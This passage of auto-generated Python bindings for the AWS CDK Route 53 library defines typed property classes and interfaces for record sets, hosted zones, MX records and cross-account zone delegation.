if weight is not None:
self._values["weight"] = weight
@builtins.property
def name(self) -> builtins.str:
'''``AWS::Route53::RecordSet.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-name
'''
result = self._values.get("name")
assert result is not None, "Required property 'name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def type(self) -> builtins.str:
'''``AWS::Route53::RecordSet.Type``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-type
'''
result = self._values.get("type")
assert result is not None, "Required property 'type' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def alias_target(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnRecordSet.AliasTargetProperty]]:
'''``AWS::Route53::RecordSet.AliasTarget``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-aliastarget
'''
result = self._values.get("alias_target")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnRecordSet.AliasTargetProperty]], result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.Comment``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def failover(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.Failover``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-failover
'''
result = self._values.get("failover")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def geo_location(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnRecordSet.GeoLocationProperty]]:
'''``AWS::Route53::RecordSet.GeoLocation``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-geolocation
'''
result = self._values.get("geo_location")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnRecordSet.GeoLocationProperty]], result)
@builtins.property
def health_check_id(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.HealthCheckId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-healthcheckid
'''
result = self._values.get("health_check_id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def hosted_zone_id(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-hostedzoneid
'''
result = self._values.get("hosted_zone_id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def hosted_zone_name(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.HostedZoneName``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-hostedzonename
'''
result = self._values.get("hosted_zone_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def multi_value_answer(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``AWS::Route53::RecordSet.MultiValueAnswer``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-multivalueanswer
'''
result = self._values.get("multi_value_answer")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def region(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.Region``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-region
'''
result = self._values.get("region")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def resource_records(self) -> typing.Optional[typing.List[builtins.str]]:
'''``AWS::Route53::RecordSet.ResourceRecords``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-resourcerecords
'''
result = self._values.get("resource_records")
return typing.cast(typing.Optional[typing.List[builtins.str]], result)
@builtins.property
def set_identifier(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.SetIdentifier``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-setidentifier
'''
result = self._values.get("set_identifier")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.TTL``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-ttl
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def weight(self) -> typing.Optional[jsii.Number]:
'''``AWS::Route53::RecordSet.Weight``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-weight
'''
result = self._values.get("weight")
return typing.cast(typing.Optional[jsii.Number], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CfnRecordSetProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CommonHostedZoneProps",
jsii_struct_bases=[],
name_mapping={
"zone_name": "zoneName",
"comment": "comment",
"query_logs_log_group_arn": "queryLogsLogGroupArn",
},
)
class CommonHostedZoneProps:
def __init__(
self,
*,
zone_name: builtins.str,
comment: typing.Optional[builtins.str] = None,
query_logs_log_group_arn: typing.Optional[builtins.str] = None,
) -> None:
'''Common properties to create a Route 53 hosted zone.
:param zone_name: The name of the domain. For resource record types that include a domain name, specify a fully qualified domain name.
:param comment: Any comments that you want to include about the hosted zone. Default: none
:param query_logs_log_group_arn: The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to. Default: disabled
'''
self._values: typing.Dict[str, typing.Any] = {
"zone_name": zone_name,
}
if comment is not None:
self._values["comment"] = comment
if query_logs_log_group_arn is not None:
self._values["query_logs_log_group_arn"] = query_logs_log_group_arn
@builtins.property
def zone_name(self) -> builtins.str:
'''The name of the domain.
For resource record types that include a domain
name, specify a fully qualified domain name.
'''
result = self._values.get("zone_name")
assert result is not None, "Required property 'zone_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''Any comments that you want to include about the hosted zone.
:default: none
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def query_logs_log_group_arn(self) -> typing.Optional[builtins.str]:
'''The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to.
:default: disabled
'''
result = self._values.get("query_logs_log_group_arn")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CommonHostedZoneProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class CrossAccountZoneDelegationRecord(
aws_cdk.core.Construct,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CrossAccountZoneDelegationRecord",
):
'''A Cross Account Zone Delegation record.'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
delegated_zone: "IHostedZone",
delegation_role: aws_cdk.aws_iam.IRole,
parent_hosted_zone_id: typing.Optional[builtins.str] = None,
parent_hosted_zone_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param delegated_zone: The zone to be delegated.
:param delegation_role: The delegation role in the parent account.
:param parent_hosted_zone_id: The hosted zone id in the parent account. Default: - no zone id
:param parent_hosted_zone_name: The hosted zone name in the parent account. Default: - no zone name
:param ttl: The resource record cache time to live (TTL). Default: Duration.days(2)
'''
props = CrossAccountZoneDelegationRecordProps(
delegated_zone=delegated_zone,
delegation_role=delegation_role,
parent_hosted_zone_id=parent_hosted_zone_id,
parent_hosted_zone_name=parent_hosted_zone_name,
ttl=ttl,
)
jsii.create(CrossAccountZoneDelegationRecord, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CrossAccountZoneDelegationRecordProps",
jsii_struct_bases=[],
name_mapping={
"delegated_zone": "delegatedZone",
"delegation_role": "delegationRole",
"parent_hosted_zone_id": "parentHostedZoneId",
"parent_hosted_zone_name": "parentHostedZoneName",
"ttl": "ttl",
},
)
class CrossAccountZoneDelegationRecordProps:
def __init__(
self,
*,
delegated_zone: "IHostedZone",
delegation_role: aws_cdk.aws_iam.IRole,
parent_hosted_zone_id: typing.Optional[builtins.str] = None,
parent_hosted_zone_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''Construction properties for a CrossAccountZoneDelegationRecord.
:param delegated_zone: The zone to be delegated.
:param delegation_role: The delegation role in the parent account.
:param parent_hosted_zone_id: The hosted zone id in the parent account. Default: - no zone id
:param parent_hosted_zone_name: The hosted zone name in the parent account. Default: - no zone name
:param ttl: The resource record cache time to live (TTL). Default: Duration.days(2)
'''
self._values: typing.Dict[str, typing.Any] = {
"delegated_zone": delegated_zone,
"delegation_role": delegation_role,
}
if parent_hosted_zone_id is not None:
self._values["parent_hosted_zone_id"] = parent_hosted_zone_id
if parent_hosted_zone_name is not None:
self._values["parent_hosted_zone_name"] = parent_hosted_zone_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def delegated_zone(self) -> "IHostedZone":
'''The zone to be delegated.'''
result = self._values.get("delegated_zone")
assert result is not None, "Required property 'delegated_zone' is missing"
return typing.cast("IHostedZone", result)
@builtins.property
def delegation_role(self) -> aws_cdk.aws_iam.IRole:
'''The delegation role in the parent account.'''
result = self._values.get("delegation_role")
assert result is not None, "Required property 'delegation_role' is missing"
return typing.cast(aws_cdk.aws_iam.IRole, result)
@builtins.property
def parent_hosted_zone_id(self) -> typing.Optional[builtins.str]:
'''The hosted zone id in the parent account.
:default: - no zone id
'''
result = self._values.get("parent_hosted_zone_id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def parent_hosted_zone_name(self) -> typing.Optional[builtins.str]:
'''The hosted zone name in the parent account.
:default: - no zone name
'''
result = self._values.get("parent_hosted_zone_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.days(2)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CrossAccountZoneDelegationRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.HostedZoneAttributes",
jsii_struct_bases=[],
name_mapping={"hosted_zone_id": "hostedZoneId", "zone_name": "zoneName"},
)
class HostedZoneAttributes:
def __init__(
self,
*,
hosted_zone_id: builtins.str,
zone_name: builtins.str,
) -> None:
'''Reference to a hosted zone.
:param hosted_zone_id: Identifier of the hosted zone.
:param zone_name: Name of the hosted zone.
'''
self._values: typing.Dict[str, typing.Any] = {
"hosted_zone_id": hosted_zone_id,
"zone_name": zone_name,
}
@builtins.property
def hosted_zone_id(self) -> builtins.str:
'''Identifier of the hosted zone.'''
result = self._values.get("hosted_zone_id")
assert result is not None, "Required property 'hosted_zone_id' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def zone_name(self) -> builtins.str:
'''Name of the hosted zone.'''
result = self._values.get("zone_name")
assert result is not None, "Required property 'zone_name' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "HostedZoneAttributes(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.HostedZoneProps",
jsii_struct_bases=[CommonHostedZoneProps],
name_mapping={
"zone_name": "zoneName",
"comment": "comment",
"query_logs_log_group_arn": "queryLogsLogGroupArn",
"vpcs": "vpcs",
},
)
class HostedZoneProps(CommonHostedZoneProps):
def __init__(
self,
*,
zone_name: builtins.str,
comment: typing.Optional[builtins.str] = None,
query_logs_log_group_arn: typing.Optional[builtins.str] = None,
vpcs: typing.Optional[typing.Sequence[aws_cdk.aws_ec2.IVpc]] = None,
) -> None:
'''Properties of a new hosted zone.
:param zone_name: The name of the domain. For resource record types that include a domain name, specify a fully qualified domain name.
:param comment: Any comments that you want to include about the hosted zone. Default: none
:param query_logs_log_group_arn: The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to. Default: disabled
:param vpcs: A VPC that you want to associate with this hosted zone. When you specify this property, a private hosted zone will be created. You can associate additional VPCs to this private zone using ``addVpc(vpc)``. Default: public (no VPCs associated)
'''
self._values: typing.Dict[str, typing.Any] = {
"zone_name": zone_name,
}
if comment is not None:
self._values["comment"] = comment
if query_logs_log_group_arn is not None:
self._values["query_logs_log_group_arn"] = query_logs_log_group_arn
if vpcs is not None:
self._values["vpcs"] = vpcs
@builtins.property
def zone_name(self) -> builtins.str:
'''The name of the domain.
For resource record types that include a domain
name, specify a fully qualified domain name.
'''
result = self._values.get("zone_name")
assert result is not None, "Required property 'zone_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''Any comments that you want to include about the hosted zone.
:default: none
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def query_logs_log_group_arn(self) -> typing.Optional[builtins.str]:
'''The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to.
:default: disabled
'''
result = self._values.get("query_logs_log_group_arn")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def vpcs(self) -> typing.Optional[typing.List[aws_cdk.aws_ec2.IVpc]]:
'''A VPC that you want to associate with this hosted zone.
When you specify
this property, a private hosted zone will be created.
You can associate additional VPCs to this private zone using ``addVpc(vpc)``.
:default: public (no VPCs associated)
'''
result = self._values.get("vpcs")
return typing.cast(typing.Optional[typing.List[aws_cdk.aws_ec2.IVpc]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "HostedZoneProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.HostedZoneProviderProps",
jsii_struct_bases=[],
name_mapping={
"domain_name": "domainName",
"private_zone": "privateZone",
"vpc_id": "vpcId",
},
)
class HostedZoneProviderProps:
def __init__(
self,
*,
domain_name: builtins.str,
private_zone: typing.Optional[builtins.bool] = None,
vpc_id: typing.Optional[builtins.str] = None,
) -> None:
'''Zone properties for looking up the Hosted Zone.
:param domain_name: The zone domain e.g. example.com.
:param private_zone: Whether the zone that is being looked up is a private hosted zone. Default: false
:param vpc_id: Specifies the ID of the VPC associated with a private hosted zone. If a VPC ID is provided and privateZone is false, no results will be returned and an error will be raised Default: - No VPC ID
'''
self._values: typing.Dict[str, typing.Any] = {
"domain_name": domain_name,
}
if private_zone is not None:
self._values["private_zone"] = private_zone
if vpc_id is not None:
self._values["vpc_id"] = vpc_id
@builtins.property
def domain_name(self) -> builtins.str:
'''The zone domain e.g. example.com.'''
result = self._values.get("domain_name")
assert result is not None, "Required property 'domain_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def private_zone(self) -> typing.Optional[builtins.bool]:
'''Whether the zone that is being looked up is a private hosted zone.
:default: false
'''
result = self._values.get("private_zone")
return typing.cast(typing.Optional[builtins.bool], result)
@builtins.property
def vpc_id(self) -> typing.Optional[builtins.str]:
'''Specifies the ID of the VPC associated with a private hosted zone.
If a VPC ID is provided and privateZone is false, no results will be returned
and an error will be raised
:default: - No VPC ID
'''
result = self._values.get("vpc_id")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "HostedZoneProviderProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.interface(jsii_type="@aws-cdk/aws-route53.IAliasRecordTarget")
class IAliasRecordTarget(typing_extensions.Protocol):
'''Classes that are valid alias record targets, like CloudFront distributions and load balancers, should implement this interface.'''
@jsii.member(jsii_name="bind")
def bind(
self,
record: "IRecordSet",
zone: typing.Optional["IHostedZone"] = None,
) -> AliasRecordTargetConfig:
'''Return hosted zone ID and DNS name, usable for Route53 alias targets.
:param record: -
:param zone: -
'''
...
class _IAliasRecordTargetProxy:
'''Classes that are valid alias record targets, like CloudFront distributions and load balancers, should implement this interface.'''
__jsii_type__: typing.ClassVar[str] = "@aws-cdk/aws-route53.IAliasRecordTarget"
@jsii.member(jsii_name="bind")
def bind(
self,
record: "IRecordSet",
zone: typing.Optional["IHostedZone"] = None,
) -> AliasRecordTargetConfig:
'''Return hosted zone ID and DNS name, usable for Route53 alias targets.
:param record: -
:param zone: -
'''
return typing.cast(AliasRecordTargetConfig, jsii.invoke(self, "bind", [record, zone]))
# Adding a "__jsii_proxy_class__(): typing.Type" function to the interface
typing.cast(typing.Any, IAliasRecordTarget).__jsii_proxy_class__ = lambda : _IAliasRecordTargetProxy
@jsii.interface(jsii_type="@aws-cdk/aws-route53.IHostedZone")
class IHostedZone(aws_cdk.core.IResource, typing_extensions.Protocol):
'''Imported or created hosted zone.'''
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneArn")
def hosted_zone_arn(self) -> builtins.str:
'''ARN of this hosted zone, such as arn:${Partition}:route53:::hostedzone/${Id}.
:attribute: true
'''
...
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneId")
def hosted_zone_id(self) -> builtins.str:
'''ID of this hosted zone, such as "Z23ABC4XYZL05B".
:attribute: true
'''
...
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="zoneName")
def zone_name(self) -> builtins.str:
'''FQDN of this hosted zone.'''
...
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneNameServers")
def hosted_zone_name_servers(self) -> typing.Optional[typing.List[builtins.str]]:
'''Returns the set of name servers for the specific hosted zone. For example: ns1.example.com.
This attribute will be undefined for private hosted zones or hosted zones imported from another stack.
:attribute: true
'''
...
class _IHostedZoneProxy(
jsii.proxy_for(aws_cdk.core.IResource) # type: ignore[misc]
):
'''Imported or created hosted zone.'''
__jsii_type__: typing.ClassVar[str] = "@aws-cdk/aws-route53.IHostedZone"
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneArn")
def hosted_zone_arn(self) -> builtins.str:
'''ARN of this hosted zone, such as arn:${Partition}:route53:::hostedzone/${Id}.
:attribute: true
'''
return typing.cast(builtins.str, jsii.get(self, "hostedZoneArn"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneId")
def hosted_zone_id(self) -> builtins.str:
'''ID of this hosted zone, such as "Z23ABC4XYZL05B".
:attribute: true
'''
return typing.cast(builtins.str, jsii.get(self, "hostedZoneId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="zoneName")
def zone_name(self) -> builtins.str:
'''FQDN of this hosted zone.'''
return typing.cast(builtins.str, jsii.get(self, "zoneName"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneNameServers")
def hosted_zone_name_servers(self) -> typing.Optional[typing.List[builtins.str]]:
'''Returns the set of name servers for the specific hosted zone. For example: ns1.example.com.
This attribute will be undefined for private hosted zones or hosted zones imported from another stack.
:attribute: true
'''
return typing.cast(typing.Optional[typing.List[builtins.str]], jsii.get(self, "hostedZoneNameServers"))
# Adding a "__jsii_proxy_class__(): typing.Type" function to the interface
typing.cast(typing.Any, IHostedZone).__jsii_proxy_class__ = lambda : _IHostedZoneProxy
@jsii.interface(jsii_type="@aws-cdk/aws-route53.IPrivateHostedZone")
class IPrivateHostedZone(IHostedZone, typing_extensions.Protocol):
'''Represents a Route 53 private hosted zone.'''
pass
class _IPrivateHostedZoneProxy(
jsii.proxy_for(IHostedZone) # type: ignore[misc]
):
'''Represents a Route 53 private hosted zone.'''
__jsii_type__: typing.ClassVar[str] = "@aws-cdk/aws-route53.IPrivateHostedZone"
pass
# Adding a "__jsii_proxy_class__(): typing.Type" function to the interface
typing.cast(typing.Any, IPrivateHostedZone).__jsii_proxy_class__ = lambda : _IPrivateHostedZoneProxy
@jsii.interface(jsii_type="@aws-cdk/aws-route53.IPublicHostedZone")
class IPublicHostedZone(IHostedZone, typing_extensions.Protocol):
'''Represents a Route 53 public hosted zone.'''
pass
class _IPublicHostedZoneProxy(
jsii.proxy_for(IHostedZone) # type: ignore[misc]
):
'''Represents a Route 53 public hosted zone.'''
__jsii_type__: typing.ClassVar[str] = "@aws-cdk/aws-route53.IPublicHostedZone"
pass
# Adding a "__jsii_proxy_class__(): typing.Type" function to the interface
typing.cast(typing.Any, IPublicHostedZone).__jsii_proxy_class__ = lambda : _IPublicHostedZoneProxy
@jsii.interface(jsii_type="@aws-cdk/aws-route53.IRecordSet")
class IRecordSet(aws_cdk.core.IResource, typing_extensions.Protocol):
'''A record set.'''
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="domainName")
def domain_name(self) -> builtins.str:
'''The domain name of the record.'''
...
class _IRecordSetProxy(
jsii.proxy_for(aws_cdk.core.IResource) # type: ignore[misc]
):
'''A record set.'''
__jsii_type__: typing.ClassVar[str] = "@aws-cdk/aws-route53.IRecordSet"
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="domainName")
def domain_name(self) -> builtins.str:
'''The domain name of the record.'''
return typing.cast(builtins.str, jsii.get(self, "domainName"))
# Adding a "__jsii_proxy_class__(): typing.Type" function to the interface
typing.cast(typing.Any, IRecordSet).__jsii_proxy_class__ = lambda : _IRecordSetProxy
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.MxRecordValue",
jsii_struct_bases=[],
name_mapping={"host_name": "hostName", "priority": "priority"},
)
class MxRecordValue:
def __init__(self, *, host_name: builtins.str, priority: jsii.Number) -> None:
'''Properties for a MX record value.
:param host_name: The mail server host name.
:param priority: The priority.
'''
self._values: typing.Dict[str, typing.Any] = {
"host_name": host_name,
"priority": priority,
}
@builtins.property
def host_name(self) -> builtins.str:
'''The mail server host name.'''
result = self._values.get("host_name")
assert result is not None, "Required property 'host_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def priority(self) -> jsii.Number:
'''The priority.'''
result = self._values.get("priority")
assert result is not None, "Required property 'priority' is missing"
return typing.cast(jsii.Number, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "MxRecordValue(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.PrivateHostedZoneProps",
jsii_struct_bases=[CommonHostedZoneProps],
name_mapping={
"zone_name": "zoneName",
"comment": "comment",
"query_logs_log_group_arn": "queryLogsLogGroupArn",
"vpc": "vpc",
},
)
class PrivateHostedZoneProps(CommonHostedZoneProps):
def __init__(
self,
*,
zone_name: builtins.str,
comment: typing.Optional[builtins.str] = None,
query_logs_log_group_arn: typing.Optional[builtins.str] = None,
vpc: aws_cdk.aws_ec2.IVpc,
) -> None:
'''Properties to create a Route 53 private hosted zone.
:param zone_name: The name of the domain. For resource record types that include a domain name, specify a fully qualified domain name.
:param comment: Any comments that you want to include about the hosted zone. Default: none
:param query_logs_log_group_arn: The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to. Default: disabled
:param vpc: A VPC that you want to associate with this hosted zone. Private hosted zones must be associated with at least one VPC. You can associated additional VPCs using ``addVpc(vpc)``.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone_name": zone_name,
"vpc": vpc,
}
if comment is not None:
self._values["comment"] = comment
if query_logs_log_group_arn is not None:
self._values["query_logs_log_group_arn"] = query_logs_log_group_arn
@builtins.property
def zone_name(self) -> builtins.str:
'''The name of the domain.
For resource record types that include a domain
name, specify a fully qualified domain name.
'''
result = self._values.get("zone_name")
assert result is not None, "Required property 'zone_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''Any comments that you want to include about the hosted zone.
:default: none
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def query_logs_log_group_arn(self) -> typing.Optional[builtins.str]:
'''The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to.
:default: disabled
'''
result = self._values.get("query_logs_log_group_arn")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def vpc(self) -> aws_cdk.aws_ec2.IVpc:
'''A VPC that you want to associate with this hosted zone.
Private hosted zones must be associated with at least one VPC. You can
associated additional VPCs using ``addVpc(vpc)``.
'''
result = self._values.get("vpc")
assert result is not None, "Required property 'vpc' is missing"
return typing.cast(aws_cdk.aws_ec2.IVpc, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "PrivateHostedZoneProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.PublicHostedZoneProps",
jsii_struct_bases=[CommonHostedZoneProps],
name_mapping={
"zone_name": "zoneName",
"comment": "comment",
"query_logs_log_group_arn": "queryLogsLogGroupArn",
"caa_amazon": "caaAmazon",
"cross_account_zone_delegation_principal": "crossAccountZoneDelegationPrincipal",
"cross_account_zone_delegation_role_name": "crossAccountZoneDelegationRoleName",
},
)
class PublicHostedZoneProps(CommonHostedZoneProps):
def __init__(
self,
*,
zone_name: builtins.str,
comment: typing.Optional[builtins.str] = None,
query_logs_log_group_arn: typing.Optional[builtins.str] = None,
caa_amazon: typing.Optional[builtins.bool] = None,
cross_account_zone_delegation_principal: typing.Optional[aws_cdk.aws_iam.IPrincipal] = None,
cross_account_zone_delegation_role_name: typing.Optional[builtins.str] = None,
) -> None:
'''Construction properties for a PublicHostedZone.
:param zone_name: The name of the domain. For resource record types that include a domain name, specify a fully qualified domain name.
:param comment: Any comments that you want to include about the hosted zone. Default: none
:param query_logs_log_group_arn: The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to. Default: disabled
:param caa_amazon: Whether to create a CAA record to restrict certificate authorities allowed to issue certificates for this domain to Amazon only. Default: false
:param cross_account_zone_delegation_principal: A principal which is trusted to assume a role for zone delegation. Default: - No delegation configuration
:param cross_account_zone_delegation_role_name: The name of the role created for cross account delegation. Default: - A role name is generated automatically
'''
self._values: typing.Dict[str, typing.Any] = {
"zone_name": zone_name,
}
if comment is not None:
self._values["comment"] = comment
if query_logs_log_group_arn is not None:
self._values["query_logs_log_group_arn"] = query_logs_log_group_arn
if caa_amazon is not None:
self._values["caa_amazon"] = caa_amazon
if cross_account_zone_delegation_principal is not None:
self._values["cross_account_zone_delegation_principal"] = cross_account_zone_delegation_principal
if cross_account_zone_delegation_role_name is not None:
self._values["cross_account_zone_delegation_role_name"] = cross_account_zone_delegation_role_name
@builtins.property
def zone_name(self) -> builtins.str:
'''The name of the domain.
For resource record types that include a domain
name, specify a fully qualified domain name.
'''
result = self._values.get("zone_name")
assert result is not None, "Required property 'zone_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''Any comments that you want to include about the hosted zone.
:default: none
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def query_logs_log_group_arn(self) -> typing.Optional[builtins.str]:
'''The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to.
:default: disabled
'''
result = self._values.get("query_logs_log_group_arn")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def caa_amazon(self) -> typing.Optional[builtins.bool]:
'''Whether to create a CAA record to restrict certificate authorities allowed to issue certificates for this domain to Amazon only.
:default: false
'''
result = self._values.get("caa_amazon")
return typing.cast(typing.Optional[builtins.bool], result)
@builtins.property
def cross_account_zone_delegation_principal(
self,
) -> typing.Optional[aws_cdk.aws_iam.IPrincipal]:
'''A principal which is trusted to assume a role for zone delegation.
:default: - No delegation configuration
'''
result = self._values.get("cross_account_zone_delegation_principal")
return typing.cast(typing.Optional[aws_cdk.aws_iam.IPrincipal], result)
@builtins.property
